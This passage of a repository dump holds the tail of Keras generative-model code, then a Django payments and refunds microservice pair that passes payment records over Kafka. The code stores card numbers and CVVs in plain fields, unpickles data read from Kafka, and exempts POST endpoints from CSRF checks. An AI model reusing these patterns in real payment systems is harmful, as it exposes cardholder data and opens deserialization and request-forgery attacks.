    x = Conv2D(256, (2,2), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    x = Dropout(0.5)(x)
    x = Conv2D(512, (2,2), strides=(1,1))(x)
    x = ConvMaxout(n_piece=2)(x)
    # 1x1-conv classification head.
    c = Dropout(0.5)(x)
    c = Conv2D(1024, (1,1), strides=(1,1))(c)
    c = ConvMaxout(n_piece=2)(c)
    c = Dropout(0.5)(c)
    c = Conv2D(1024, (1,1), strides=(1,1))(c)
    c = ConvMaxout(n_piece=2)(c)
    c = Dropout(0.5)(c)
    c = Conv2D(1, (1,1), strides=(1,1), activation='sigmoid')(c)
    validity = Flatten()(c)
    # FIX: removed the nine per-layer debug shape prints left over from
    # development; they spammed stdout on every model construction.
    return Model(x_in, validity)
def aae_discriminator_model():
    """AAE discriminator: 64-d code -> probability it came from the prior."""
    code_in = Input(shape=(latent_dim,))
    # Treat the code as a 1x1 "image" so the 1x1-conv stack applies.
    h = Reshape((1, 1, latent_dim))(code_in)
    for rate, n_filters in ((0.2, 512), (0.5, 512)):
        h = Dropout(rate)(h)
        h = Conv2D(n_filters, (1, 1), strides=(1, 1))(h)
        h = ConvMaxout(n_piece=2)(h)
    # 1x1-conv classification head.
    for _ in range(2):
        h = Dropout(0.5)(h)
        h = Conv2D(1024, (1, 1), strides=(1, 1))(h)
        h = ConvMaxout(n_piece=2)(h)
    h = Dropout(0.5)(h)
    h = Conv2D(1, (1, 1), strides=(1, 1), activation='sigmoid')(h)
    return Model(code_in, Flatten()(h))
def bigan_model(generator, encoder, discriminator):
    """Joint BiGAN graph: score (z, G(z)) as fake and (E(x), x) as valid."""
    latent_in = Input(shape=(latent_dim,))
    image_in = Input(shape=img_shape)
    generated_image = generator(latent_in)
    inferred_code = encoder(image_in)
    fake_score = discriminator([latent_in, generated_image])
    valid_score = discriminator([inferred_code, image_in])
    return Model([latent_in, image_in], [fake_score, valid_score])
def gan_model(generator, discriminator):
    """Stacked GAN graph: latent -> generator -> discriminator score."""
    return Sequential([generator, discriminator])
def autoencoder_model(encoder, decoder):
    """Plain autoencoder graph: encode, then decode."""
    stacked = Sequential()
    for stage in (encoder, decoder):
        stacked.add(stage)
    return stacked
def aae_model(encoder, decoder, discriminator):
    """AAE training graph: reconstruction plus discriminator score on the code."""
    image_in = Input(shape=img_shape)
    code = encoder(image_in)
    reconstruction = decoder(code)
    code_validity = discriminator(code)
    return Model(image_in, [reconstruction, code_validity])
def latent_reconstructor_model(d, e):
    """Latent reconstructor: decode a code with `d`, then re-encode with `e`."""
    return Sequential([d, e])
def sampling():
    """Build a reparameterization model: (z_mean, z_log_var) -> sampled z."""
    z_mean = Input(shape=(latent_dim,))
    z_log_var = Input(shape=(latent_dim,))
    # z = mean + std * eps, with std = exp(log_var / 2) and eps ~ N(0, I).
    noise = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
                            mean=0., stddev=1.0)
    sampled = z_mean + K.exp(z_log_var / 2) * noise
    return Model([z_mean, z_log_var], sampled)
def vae_model(encoder, generator):
    """End-to-end VAE graph: image -> (mean, log_var) -> sampled z -> reconstruction."""
    x = Input(shape=img_shape)
    z_mean, z_log_var = encoder(x)
    # BUG FIX: sampling() takes no arguments and returns a Model; the
    # original called sampling([z_mean, z_log_var]) which raises TypeError.
    # Build the sampler first, then apply it to the two tensors.
    z = sampling()([z_mean, z_log_var])
    recon_x = generator(z)
    return Model(x, recon_x)
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,522 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/urls.py | from django.urls import path
from . import views
app_name = 'payments'  # URL namespace: reverse() these as 'payments:<name>'.
urlpatterns = [
    # --- JSON/API endpoints, mounted under /payments/ ---
    # /payments/
    path('', views.listAllPayments, name='allPayments'),
    path('payment/<payment_id>/', views.showPayment, name='showPayment'),
    path('newPayment/', views.newPayment, name='newPayment'),
    path('deletePayment/<payment_id>/', views.deletePayment, name='deletePayment'),
    path('settlePayment/<payment_id>/', views.settlePayment, name='settlePayment'),
    path('filterPayments/', views.filterPayments, name='filterPayments'),
    # Views that render a GUI (HTML templates)
    path('allPayments/', views.listAllPaymentsGUI, name='allPaymentsGUI'),
    path('paymentGUI/<payment_id>/', views.showPaymentGUI, name='showPaymentGUI'),
    path('newPaymentGUI/', views.newPaymentGUI, name='newPaymentGUI'),
    path('processPayment/', views.processPayment, name='processPayment'),
    path('deletePaymentGUI/<payment_id>/', views.deletePaymentGUI, name='deletePaymentGUI'),
    path('settlePaymentGUI/<payment_id>/', views.settlePaymentGUI, name='settlePaymentGUI'),
    path('filterPaymentGUI/', views.filterPaymentsGUI, name='filterPaymentsGUI'),
] | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,523 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/views.py | from django.forms.models import model_to_dict
from django.http.request import HttpRequest
from django.http.response import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound, JsonResponse
from django.shortcuts import get_object_or_404, redirect, render
from .models import Base, CreditCard, MbWay, BaseForm, CreditCardForm, MbWayForm
from kafka import KafkaProducer
import pickle
from django.views.decorators.csrf import csrf_exempt
import datetime
# Refunds microservice URL (only used by the GUI views to link to the
# newRefund page of the refunds service).
refunds_url = 'http://172.26.1.2:2222/api/refunds/'
# Kafka bootstrap server address.
kafka_server = 'kafka:9092'
def kafkaProd(topic, key, data):
    """Publish `data`, pickled under `key`, to the given Kafka topic.

    Returns True when the message was handed to the broker, False when the
    producer rejected it. NOTE(review): only AssertionError is caught, as in
    the original — network errors from send()/flush() still propagate.
    """
    producer = KafkaProducer(bootstrap_servers=kafka_server)
    serialized_data = pickle.dumps({'data': data}, pickle.HIGHEST_PROTOCOL)
    try:
        producer.send(topic, key=bytes(key, 'utf-8'), value=serialized_data)
        producer.flush()
        return True
    except AssertionError:
        return False
    finally:
        # FIX: the original created a new producer per call and never closed
        # it, leaking sockets/threads on every published payment.
        producer.close()
#
# Auxiliar functions
#
def is_date(value):
    """Return True iff `value` matches the 'YYYY-MM-DD HH:MM' timestamp format.

    FIX: the parameter was named `str`, shadowing the builtin; renamed to
    `value` (all call sites pass it positionally).
    """
    try:
        datetime.datetime.strptime(value, '%Y-%m-%d %H:%M')
        return True
    except ValueError:
        return False
def findPayment(payment_id):
    """Return (base_row, method_specific_row) for a payment; 404 if missing.

    Every payment is assumed to have exactly one detail row (CreditCard or
    MbWay) matching its payment_method; if that row is absent, .get() raises
    DoesNotExist — presumably only possible for half-created payments,
    TODO confirm.
    """
    payment = get_object_or_404(Base, payment_id=payment_id)
    # credit_card
    if payment.payment_method == Base.CC:
        full_payment = CreditCard.objects.get(payment_id=payment_id)
    # MBWay
    else:
        full_payment = MbWay.objects.get(payment_id=payment_id)
    return payment, full_payment
def is_valid_queryparam(param):
    """A query parameter counts as provided when it is neither None nor ''."""
    if param is None:
        return False
    return param != ''
def filter(request):
    """Apply the GET query parameters as chained QuerySet filters on Base.

    Supported params: payment_id, min_amount/max_amount, payment_method,
    status, min_created_at/max_created_at, min_settled_at/max_settled_at.
    The literal "Choose..." is the GUI dropdown placeholder and means
    "no filter". NOTE(review): this function shadows the builtin `filter`
    inside this module; kept because other views call it by this name.
    """
    payments = Base.objects.all()
    payment_id = request.GET.get('payment_id')
    min_amount = request.GET.get('min_amount')
    max_amount = request.GET.get('max_amount')
    payment_method = request.GET.get('payment_method')
    status = request.GET.get('status')
    min_created_at = request.GET.get('min_created_at')
    max_created_at = request.GET.get('max_created_at')
    min_settled_at = request.GET.get('min_settled_at')
    max_settled_at = request.GET.get('max_settled_at')
    if is_valid_queryparam(payment_id) and payment_id != "Choose...":
        payments = payments.filter(payment_id=payment_id)
    if is_valid_queryparam(min_amount):
        payments = payments.filter(amount__gte=min_amount)
    if is_valid_queryparam(max_amount):
        payments = payments.filter(amount__lte=max_amount)
    if is_valid_queryparam(payment_method) and payment_method != "Choose...":
        payments = payments.filter(payment_method=payment_method)
    if is_valid_queryparam(status) and status != "Choose...":
        payments = payments.filter(status=status)
    if is_valid_queryparam(min_created_at):
        payments = payments.filter(created_at__gte=min_created_at)
    if is_valid_queryparam(max_created_at):
        # NOTE(review): max bounds use __lt (exclusive) while min bounds use
        # __gte (inclusive) — confirm this asymmetry is intended.
        payments = payments.filter(created_at__lt=max_created_at)
    if is_valid_queryparam(min_settled_at):
        payments = payments.filter(settled_at__gte=min_settled_at)
    if is_valid_queryparam(max_settled_at):
        payments = payments.filter(settled_at__lt=max_settled_at)
    return payments
def settlePayment_aux(payment_id):
    """Mark the payment as fully settled as of now (404 if unknown)."""
    payment = get_object_or_404(Base, payment_id=payment_id)
    payment.settled_amount = payment.amount
    payment.settled_at = datetime.datetime.now()
    payment.status = Base.SETTLED
    payment.save()
#
# Views that return Responses
#
def listAllPayments(request):
    """JSON list of every payment.

    created_at is added by hand because model_to_dict skips non-editable
    (auto_now_add) fields.
    """
    def serialize(payment):
        entry = model_to_dict(payment)
        entry['created_at'] = payment.created_at
        return entry

    return JsonResponse(
        {'payments': [serialize(p) for p in Base.objects.all()]}, status=200)
def showPayment(request, payment_id):
    """JSON detail for one payment, including its method-specific fields."""
    base, details = findPayment(payment_id)
    # findPayment 404s on a missing payment, so this guard is effectively
    # defensive; kept to preserve the original behavior.
    if base is None:
        return HttpResponseNotFound('Payment not found')
    payload = model_to_dict(base)
    payload['created_at'] = base.created_at
    payload['additional_parameters'] = model_to_dict(details)
    return JsonResponse({'base': payload}, status=200)
def filterPayments(request):
    """JSON list of payments matching the GET query filters."""
    matched = list(map(model_to_dict, filter(request)))
    return JsonResponse({'filteredPayments': matched}, status=200)
def _amounts_match(settled, total):
    # Helper: True when both amounts are present and numerically equal
    # (so '10' and '10.0' are recognised as the same amount).
    try:
        return (settled is not None and total is not None
                and float(settled) == float(total))
    except (TypeError, ValueError):
        return False


@csrf_exempt
def newPayment(request):
    """
    POST: create a payment (plus its method-specific record) and publish it
    to the 'payment' Kafka topic.

    Expected fields: amount, payment_method, optionally settled_at
    ('YYYY-MM-DD HH:MM') with settled_amount, plus credit-card or MBWay
    fields depending on payment_method. Responds 200 on success, 400 on bad
    input, 503 when Kafka publishing fails (the row is rolled back).
    """
    if request.method != 'POST':
        return HttpResponseBadRequest("Data not found.")
    payment = Base()
    payment.amount = request.POST.get('amount')
    payment.payment_method = request.POST.get('payment_method')
    if 'settled_at' in request.POST:
        settled_at = request.POST.get('settled_at')
        if not is_date(settled_at):
            return HttpResponseBadRequest('"settled_at must have a format YYYY-MM-DD HH:MM"')
        payment.settled_at = settled_at
        payment.settled_amount = request.POST.get('settled_amount')
    payment.status = Base.SUCCESS
    # BUG FIX: the original compared the raw POST strings, so '10' vs '10.0'
    # was not recognised as fully settled; compare numerically instead.
    if _amounts_match(payment.settled_amount, payment.amount):
        payment.status = Base.SETTLED
    if payment.payment_method == Base.CC:
        cc = CreditCard()
        cc.payment_id = payment
        cc.number = request.POST.get('number')
        cc.name = request.POST.get('name')
        cc.expiration_month = request.POST.get('expiration_month')
        cc.expiration_year = request.POST.get('expiration_year')
        cc.cvv = request.POST.get('cvv')
        payment.save()
        cc.save()
    elif payment.payment_method == Base.MBWay:
        mbway = MbWay()
        mbway.payment_id = payment
        mbway.phone_number = request.POST.get('phone_number')
        payment.save()
        mbway.save()
    else:
        # Unknown method: record the failed attempt, then reject.
        payment.status = Base.ERROR
        payment.save()
        return HttpResponseBadRequest('Bad payment method')
    paymentDict = model_to_dict(payment)
    paymentDict['created_at'] = payment.created_at
    if kafkaProd(topic='payment', key=str(payment.payment_id), data=paymentDict):
        return HttpResponse('New payment created.', status=200)
    # Keep DB and topic consistent: roll back the row if publishing failed.
    payment.delete()
    return HttpResponse('Payment could not be published to topic.', status=503)
def settlePayment(request, payment_id):
    """API endpoint: settle the payment in full and acknowledge."""
    settlePayment_aux(payment_id)
    return HttpResponse('Payment settled.', status=200)
def deletePayment(request, payment_id):
    """API endpoint: delete the payment (404 if unknown) and confirm."""
    target = get_object_or_404(Base, payment_id=payment_id)
    target.delete()
    return HttpResponse('Payment ' + payment_id + ' deleted.', status=200)
#
# Views that render a GUI
#
def listAllPaymentsGUI(request):
    """Render the HTML listing of all payments."""
    context = {'allPayments': Base.objects.all()}
    return render(request, 'payments/allPayments.html', context)
def showPaymentGUI(request, payment_id):
    """Render the detail page for one payment."""
    base, details = findPayment(payment_id)
    return render(request, 'payments/showPayment.html', {
        'payment_id': payment_id,
        'payment': details,
        # The template shows a "settle" action only while amounts differ.
        'notSettled': base.amount != base.settled_amount,
        'refunds_url': refunds_url,
    })
def filterPaymentsGUI(request):
    """Render the payment filter page with matches and dropdown choices."""
    context = {
        'payments': filter(request),
        'payment_ids': list(Base.objects.all().values_list('payment_id', flat=True)),
        'status': Base.statusOP,
        'pay_method': Base.pay_method,
    }
    return render(request, 'payments/filterPayments.html', context)
def newPaymentGUI(request):
    """Step 1 of the GUI flow: collect the base payment fields.

    On success the payment id/method are stashed in the session and the user
    is sent to processPayment for the method-specific details.
    """
    form = BaseForm(request.POST or None)
    payment_id = form['payment_id'].value()
    if not form.is_valid():
        return render(request, 'payments/createPayment.html', {'form': form})
    form.save()
    request.session['payment_id'] = payment_id
    request.session['payment_method'] = form['payment_method'].value()
    return redirect('payments:processPayment')
def processPayment(request):
    """Step 2 of the GUI flow: collect method-specific details, finalize the
    payment, and publish it to the 'payment' Kafka topic.

    Relies on session keys set by newPaymentGUI.
    NOTE(review): missing session keys raise KeyError (500); and
    float(basePayment.settled_amount) raises TypeError when settled_amount
    was never provided — confirm the form always sets it.
    """
    payment_method = request.session['payment_method']
    payment_id = request.session['payment_id']
    basePayment = get_object_or_404(Base, payment_id=payment_id)
    # Only one payment method can be associated with a payment
    if not CreditCard.objects.filter(payment_id=payment_id) and not MbWay.objects.filter(payment_id=payment_id):
        # Pick the form matching the method chosen in step 1.
        if payment_method == Base.CC:
            form = CreditCardForm(request.POST or None, initial={'payment_id': payment_id})
        else:
            form = MbWayForm(request.POST or None, initial={'payment_id': payment_id})
        if form.is_valid():
            form.save()
            # Numeric comparison decides whether the payment is fully settled.
            if float(basePayment.amount) == float(basePayment.settled_amount):
                basePayment.status = Base.SETTLED
            else:
                basePayment.status = Base.SUCCESS
            basePayment.save()
            # Publish the finalized payment for the refunds service to read.
            paymentDict = model_to_dict(basePayment)
            paymentDict['created_at'] = basePayment.created_at
            kafkaProd(topic='payment', key=payment_id, data=paymentDict)
            return redirect('payments:allPaymentsGUI')
        return render(request, 'payments/processPayment.html', {'form': form, 'payment_method': payment_method})
    return HttpResponse("Only one payment method can be associated to a payment.")
def settlePaymentGUI(request, payment_id):
    """Settle the payment, then bounce back to its detail page."""
    settlePayment_aux(payment_id)
    return redirect('payments:showPaymentGUI', payment_id)
def deletePaymentGUI(request, payment_id):
    """Delete the payment, then return to the listing page."""
    doomed = get_object_or_404(Base, payment_id=payment_id)
    doomed.delete()
    return redirect('payments:allPaymentsGUI')
53,524 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0003_creditcard_mbway.py | # Generated by Django 2.2.12 on 2021-09-14 14:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: (re)create the MbWay and CreditCard detail
    tables, each holding method-specific fields keyed to a Base payment."""

    dependencies = [
        ('payments', '0002_auto_20210914_1405'),
    ]

    operations = [
        migrations.CreateModel(
            name='MbWay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone_number', models.CharField(max_length=9)),
                # Detail rows are removed together with their base payment.
                ('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
            ],
        ),
        migrations.CreateModel(
            name='CreditCard',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('number', models.CharField(max_length=16)),
                ('name', models.CharField(max_length=30)),
                ('expiration_month', models.CharField(max_length=2)),
                ('expiration_year', models.CharField(max_length=4)),
                ('cvv', models.CharField(max_length=3)),
                ('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
            ],
        ),
    ]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,525 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0001_initial.py | # Generated by Django 2.2.12 on 2021-09-14 11:36
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    """Auto-generated initial migration: create the Base payment table plus
    the MbWay and CreditCard method-detail tables."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Base',
            fields=[
                # Payments are addressed by a random UUID, not an auto int.
                ('payment_id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)),
                ('amount', models.FloatField()),
                ('payment_method', models.CharField(choices=[('cc', 'credit_card'), ('mb', 'mbway')], max_length=50)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('status', models.CharField(choices=[('s', 'success'), ('e', 'error'), ('st', 'settled')], max_length=20)),
                # Null until the payment is (partially) settled.
                ('settled_at', models.DateTimeField(null=True)),
                ('settled_amount', models.FloatField(null=True)),
            ],
        ),
        migrations.CreateModel(
            name='MbWay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone_number', models.CharField(max_length=9)),
                ('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
            ],
        ),
        migrations.CreateModel(
            name='CreditCard',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('number', models.CharField(max_length=16)),
                ('name', models.CharField(max_length=30)),
                ('expiration_month', models.CharField(max_length=2)),
                ('expiration_year', models.CharField(max_length=4)),
                ('cvv', models.CharField(max_length=3)),
                ('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
            ],
        ),
    ]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,526 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/urls.py | from django.urls import path
from . import views
app_name = 'refunds'  # URL namespace: reverse() these as 'refunds:<name>'.
urlpatterns = [
    # --- JSON/API endpoints, mounted under /refunds/ ---
    # /refunds/
    path('', views.listAllRefunds, name='allRefunds'),
    path('setRefundTimeout/', views.setRefundTimeout, name='setRefundTimeout'),
    path('refund/<refund_id>/', views.showRefund, name='showRefund'),
    path('newRefund/<payment_id>', views.newRefund, name='newRefund'),
    path('filterRefunds/', views.filterRefunds, name='filterRefunds'),
    # Views that render a GUI (HTML templates)
    path('allRefunds/', views.listAllRefundsGUI, name='allRefundsGUI'),
    path('refundGUI/<refund_id>/', views.showRefundGUI, name='showRefundGUI'),
    path('newRefundGUI/<payment_id>', views.newRefundGUI, name='newRefundGUI'),
    path('filterRefundsGUI/', views.filterRefundsGUI, name='filterRefundsGUI'),
] | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,527 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/views.py | from django.contrib import messages
from django.forms.models import model_to_dict
from django.http.response import HttpResponse, HttpResponseBadRequest, HttpResponseNotAllowed, HttpResponseServerError, JsonResponse
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.csrf import csrf_exempt
from .models import Refund, RefundForm
from kafka import KafkaConsumer
import pickle
import datetime
# Payments microservice URL (only used by the GUI views to link back to a
# payment's detail page).
payments_url = 'http://172.26.1.1:1111/api/payments/'
# Kafka bootstrap server address.
kafka_server = 'kafka:9092'
# Module-wide mutable setting (updated by setRefundTimeout and
# listAllRefundsGUI): refunds must be committed within `refundTimeout`
# minutes of receiving the request.
refundTimeout = 30
def kafkaCon(topic, key):
    """Fetch the first message published under `key` on `topic`.

    Returns the unpickled payload, or None when no matching message arrives.
    NOTE(review): pickle.loads on broker data is only acceptable because the
    producers are trusted sibling services — never point this at an
    untrusted broker.
    """
    # BUG FIX: without consumer_timeout_ms, iterating a KafkaConsumer blocks
    # forever when no message matches, making the original `return None`
    # unreachable; stop after 10s of broker silence instead.
    consumer = KafkaConsumer(topic, bootstrap_servers=[kafka_server],
                             auto_offset_reset='earliest',
                             consumer_timeout_ms=10000)
    try:
        for message in consumer:
            if message.key.decode('UTF-8') == key:
                return pickle.loads(message.value)['data']
        return None
    finally:
        # FIX: close the consumer so each lookup does not leak a connection.
        consumer.close()
#
# Auxiliar functions
#
def is_valid_queryparam(param):
    """True when the request actually supplied a value for this parameter."""
    return param is not None and param != ''
def getTotalAmount(payment_id):
    """Sum of all refund amounts already issued against this payment (0 if none)."""
    return sum(r.amount for r in Refund.objects.filter(payment_id=payment_id))
def refundTimePassed(initial_date):
    """True when more than `refundTimeout` minutes have elapsed since initial_date."""
    cutoff = datetime.datetime.now() - datetime.timedelta(minutes=refundTimeout)
    return initial_date < cutoff
def filter(request):
    """Apply the refund_id / payment_id GET filters to all refunds.

    The literal "Choose..." is the GUI dropdown placeholder and means
    "no filter" for that field.
    """
    matches = Refund.objects.all()
    for field in ('refund_id', 'payment_id'):
        value = request.GET.get(field)
        if is_valid_queryparam(value) and value != "Choose...":
            matches = matches.filter(**{field: value})
    return matches
def paymentToString(payment):
    """One-line human-readable summary of a payment dict from the Kafka topic."""
    created = payment['created_at'].strftime("%Y-%m-%d %H:%M:%S")
    return (
        f"Payment ID: {payment['payment_id']}, "
        f"Amount: {payment['amount']}€, "
        f"Method: {payment['payment_method']}, "
        f"Status: {payment['status']}, "
        f"Created at: {created}\n"
    )
#
# Views that return Responses
#
def listAllRefunds(request):
    """JSON list of all refunds; created_at is added by hand because
    model_to_dict skips non-editable (auto_now_add) fields."""
    payload = [dict(model_to_dict(r), created_at=r.created_at)
               for r in Refund.objects.all()]
    return JsonResponse({'refunds': payload}, status=200)
@csrf_exempt
def setRefundTimeout(request):
    """POST timeout=<minutes>: update the module-wide refund timeout."""
    global refundTimeout
    raw = request.POST.get('timeout')
    if not is_valid_queryparam(raw):
        return HttpResponseBadRequest('Invalid parameter input')
    refundTimeout = int(raw)
    return HttpResponse('Refund timeout successfully set to ' + str(refundTimeout), status=200)
@csrf_exempt
def newRefund(request, payment_id):
    """POST refund_amount=<float>: create a partial/full refund for a payment.

    The payment record is read from the Kafka 'payment' topic. Rejected when
    the payment is unknown, already fully refunded, the amount exceeds what
    remains, or processing outlasted the configured refund timeout.
    """
    start_date = datetime.datetime.now()
    payment = kafkaCon(topic='payment', key=payment_id)
    # BUG FIX: the original fell off the end (implicitly returned None) when
    # the payment could not be found, which makes Django raise; answer 500.
    if payment is None:
        return HttpResponseServerError("Could not access payments service!")
    remaining_amount = float(payment['amount']) - getTotalAmount(payment_id)
    if remaining_amount <= 0:
        # NOTE(review): HttpResponseNotAllowed expects a list of permitted
        # HTTP methods as its first argument; kept as-is pending a decision
        # on the intended status code.
        return HttpResponseNotAllowed('Payment with ID ' + str(payment_id) + " has been fully refunded already.")
    if refundTimePassed(start_date):
        return HttpResponseServerError('Could not process refund on time.')
    # FIX: refund_amount was parsed twice in the original; parse it once here.
    refundAmount = float(request.POST.get('refund_amount'))
    if refundAmount > remaining_amount:
        # BUG FIX: the original concatenated str + float, raising TypeError.
        return HttpResponseBadRequest('Refund amount must be less than or equal to ' + str(remaining_amount))
    refund = Refund()
    refund.payment_id = payment_id
    refund.amount = refundAmount
    refund.save()
    return HttpResponse('New refund created.', status=200)
def showRefund(request, refund_id):
    """JSON detail for one refund plus its payment from the Kafka topic."""
    refund = get_object_or_404(Refund, refund_id=refund_id)
    payment = kafkaCon(topic='payment', key=refund.payment_id)
    if payment is None:
        return HttpResponseServerError("Could not access payments service!")
    data = model_to_dict(refund)
    data['created_at'] = refund.created_at
    return JsonResponse({'refund': data, 'payment': payment}, status=200)
def filterRefunds(request):
    """JSON list of refunds matching the GET query filters."""
    matched = list(map(model_to_dict, filter(request)))
    return JsonResponse({'filteredRefunds': matched}, status=200)
#
# Views that render a GUI
#
def listAllRefundsGUI(request):
    """Render the page listing all refunds.

    An optional GET 'timeout' parameter updates the module-level
    refundTimeout, like the setRefundTimeout API endpoint.
    """
    global refundTimeout
    allRefunds = Refund.objects.all()
    t = request.GET.get('timeout')
    if is_valid_queryparam(t):
        # BUG FIX: the original stored the raw str here while
        # setRefundTimeout stores int(t); refundTimePassed presumably
        # compares the timeout numerically, so keep the types consistent.
        refundTimeout = int(t)
    return render(request, 'refunds/allRefunds.html', {'allRefunds': allRefunds, 'payments_url': payments_url, 'refundTimeout': refundTimeout})
def newRefundGUI(request, payment_id):
    """
    Render / process the "create refund" form for *payment_id*.

    GET shows the form with the remaining refundable amount; a valid
    POST (within the refundTimeout deadline) saves the refund and
    redirects back to the payment's page on the payments service.
    """
    global refundTimeout
    start_date = datetime.datetime.now()
    payment = kafkaCon(topic='payment', key=payment_id)
    # NOTE(review): when the payments service is unreachable (payment is
    # None) this view falls through and implicitly returns None, which
    # Django reports as a 500.  Sibling views return
    # HttpResponseServerError here -- confirm and align.
    if payment != None:
        totalPaid = getTotalAmount(payment_id)
        remaining_amount = float(payment['amount'])-totalPaid
        if remaining_amount > 0:
            form = RefundForm(request.POST or None)
            if form.is_valid() and not refundTimePassed(start_date):
                # Reject amounts above what is still refundable.
                if float(form['amount'].value()) > remaining_amount:
                    messages.info(request, 'Cannot create a new refund with that amount. Max amount is: ' + str(remaining_amount))
                    return render(request, 'refunds/createRefund.html', {'form': form, 'payment_id': payment_id, 'remaining_amount': remaining_amount})
                form.save()
                return redirect(payments_url+'paymentGUI/'+payment_id)
            # Invalid form (or deadline passed): re-render with errors.
            return render(request, 'refunds/createRefund.html', {'form': form, 'payment_id': payment_id, 'remaining_amount': remaining_amount})
        else:
            return HttpResponseNotAllowed('Payment with ID ' + str(payment_id) + " has been fully refunded already.")
def filterRefundsGUI(request):
    """Render the refund-filtering page with dropdown choices and results."""
    refund_ids = list(Refund.objects.all().values_list('refund_id', flat=True))
    payment_ids = list(Refund.objects.all().values_list('payment_id', flat=True).distinct())
    context = {'refunds': filter(request), 'refund_ids': refund_ids, 'payment_ids': payment_ids}
    return render(request, 'refunds/filterRefunds.html', context)
def showRefundGUI(request, refund_id):
    """Render the detail page for a single refund."""
    refund = get_object_or_404(Refund, refund_id=refund_id)
    payment = kafkaCon(topic='payment', key=refund.payment_id)
    if payment is None:
        return HttpResponseServerError("Could not access payments service!")
    context = {'refund_id': refund_id, 'refund': refund, 'payment': paymentToString(payment)}
    return render(request, 'refunds/showRefund.html', context)
53,528 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/migrations/0001_initial.py | # Generated by Django 2.2.12 on 2021-09-15 15:46
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    # Auto-generated initial migration for the refunds app: creates the
    # Refund table.  Do not edit applied migrations by hand.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Refund',
            fields=[
                # Auto-generated UUID primary key.
                ('refund_id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)),
                ('payment_id', models.CharField(max_length=200)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('amount', models.FloatField()),
            ],
        ),
    ]
